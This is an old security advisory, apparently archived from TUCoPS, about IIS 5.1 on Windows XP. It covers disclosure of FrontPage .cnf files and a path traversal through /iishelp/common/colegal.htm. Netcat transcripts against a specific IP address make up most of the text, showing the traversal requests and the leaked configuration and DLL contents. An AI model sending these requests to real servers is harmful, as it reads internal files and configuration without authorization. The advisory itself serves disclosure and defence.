12th Feb 2002 [SBWID-5092]
COMMAND
IIS path & directory traversal issues
SYSTEMS AFFECTED
Windows XP with IIS 5.1
PROBLEM
In NtWaK0 [http://www.SafeHack.com] advisory :
Identify WEB DIR installation. By sending this \"GET
/_vti_pvt/access.cnf\" you can identify the web installation. As we all
know this is a helpfull peace of information if someone is going to
attack your web site. Multiple .cnf are at cause.
Exploits : ========
C\\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/access.cnf
vti_encodingSR|utf8-nl
RealmNameLAMER
InheritPermissionsfalse
PasswordDird\\\\inetpub\\\\wwwroot\\\\_vti_pvt
Their is another security issue with this too.
\"InheritPermissionsfalse\" This will tell security inheritance of that
folder.
C\\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/botinfs.cnf
vti_encodingSR|utf8-nl
D\\\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\Web Server Extensions\\\\
40\\\\bots\\\\vinavbar\\\\vinavbar.infVW|vinavbar
C\\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/bots.cnf
vti_encodingSR|utf8-nl
vinavbarVW|D\\\\\\\\Program\\\\ Files\\\\\\\\Common\\\\ Files\\\\\\\\Microsoft\\\\ Shared
\\\\\\\\Web\\\\ Server\\\\ Extensions\\\\\\\\40\\\\\\\\bots\\\\\\\\vinavbar\\\\\\\\vinavbar.inf
vinavbar E I info N D\\\\\\\\Program\\\\ Files\\\\\\\\Common\\\\ Files\\\\\\\\Microsoft
\\\\ Shared\\\\\\\\Web\\\\ Server\\\\ Extensions\\\\\\\\40\\\\\\\\bots\\\\\\\\vinavbar
\\\\\\\\fp4Avnb.dll
-Also-
Using GET /iishelp/common/colegal.htm you can access other files. under
the web structure. I did not have chance to test it on file above the
web structure. Like I said I do not run IIS 5.1 but a friend does. One
of these days I am going to buy more memory for some of my old box and
Exploits :
========
C\\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /iishelp/common/colegal.htm../../../../../_vti_pvt/access.cnf
vti_encodingSR|utf8-nl
RealmNameLAMER
InheritPermissionsfalse
PasswordDird\\\\inetpub\\\\wwwroot\\\\_vti_pvt
writeto.cnf [Extracted From]
http//www.microsoft.com/technet/treeview/default.asp?url=/TechNet/
prodtechnol/office/reskit/fp98serk/appendixes/A_SPFILE.asp
Back links for files that can be written to by users of the web, such
as Save Results Form handler result files. Files that can be written to
by users of the web have a looser security setting than regular web
content.
C\\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /iishelp/common/colegal.htm../../../../../_vti_bin/_vti_adm/admin.dll
MZÉ ? ? + @a ??¦? ¦ -!+?L-!This program cannot be run in DOS mode.
$ §-Q+Q¦?ïQ¦?ïQ¦?ï3¼,ïU¦?寮5ïT¦?ïQ¦>ïF¦?ïT¦9ïP¦?寮4ïS¦?寮;ïU¦?ïRichQ¦?ï
PE L?? _; a ?!??? ? 0 c? ? µg ? ? ? ?
P ? ¿- ? ? ? ? ? ? ? » (? P 0 P?
C\\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/linkinfo.cnf
vti_encodingSR|utf8-nl
javascript\\loadhelpfront();localstart.asp
javascript\\activate(<%=iver%>);localstart.asp
http\\//www.safehack.comindex.htm
/iishelp/common/colegal.htmlocalstart.asp
SOLUTION
None yet.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
